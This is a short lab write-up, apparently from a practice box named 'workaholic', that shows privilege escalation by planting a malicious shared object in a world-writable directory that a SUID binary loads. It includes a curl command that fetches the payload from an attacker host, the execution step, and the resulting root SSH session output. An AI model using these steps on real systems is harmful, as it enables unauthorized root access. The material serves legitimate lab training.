InfoSec LAB

workaholic_Privilege_Escalation

Created: 2 min read

Shared Object Injection

It has been identified that the SUID binary, /var/www/html/wordpress/blog/wp-monitor, loads a shared object located in the home directory of the ted user, which is WRITABLE by anyone. Code execution is achievable via creating a malicious SO file.

charlie@workaholic:~$ mkdir -p /home/ted/.lib

Creating the .lib directory in the home directory of the ted user.

charlie@workaholic:~$ curl -s http://192.168.45.182/libsecurity.so -o /home/ted/.lib/libsecurity.so ; chmod 777 /home/ted/.lib/libsecurity.so

Delivering the payload.

charlie@workaholic:~$ /var/www/html/wordpress/blog/wp-monitor 2>&1
[+] Checking the logs...

Executing the SUID binary.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/workaholic]
└─$ ssh root@$IP -i ~/.ssh/id_ed25519
Enter passphrase for key '/home/kali/.ssh/id_ed25519': 
Welcome to Ubuntu 24.04.2 LTS (GNU/Linux 6.8.0-48-generic x86_64)
 
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro
 
 System information as of Fri Jun 27 05:48:14 PM UTC 2025
 
  System load:  0.4               Processes:               175
  Usage of /:   55.3% of 9.75GB   Users logged in:         1
  Memory usage: 45%               IPv4 address for ens192: 192.168.136.229
  Swap usage:   0%
 
 * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
   just raised the bar for easy, resilient and secure K8s cluster deployment.
 
   https://ubuntu.com/engage/secure-kubernetes-at-the-edge
 
Expanded Security Maintenance for Applications is not enabled.
 
17 updates can be applied immediately.
10 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable
 
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
 
 
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
 
 
Last login: Fri Apr 11 14:01:38 2025 from 192.168.118.6
root@workaholic:~# whoami
root
root@workaholic:~# hostname
workaholic
root@workaholic:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
3: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:9e:b2:d9 brd ff:ff:ff:ff:ff:ff
    altname enp11s0
    inet 192.168.136.229/24 brd 192.168.136.255 scope global ens192
       valid_lft forever preferred_lft forever

System level compromise

Interactive Graph View

Backlinks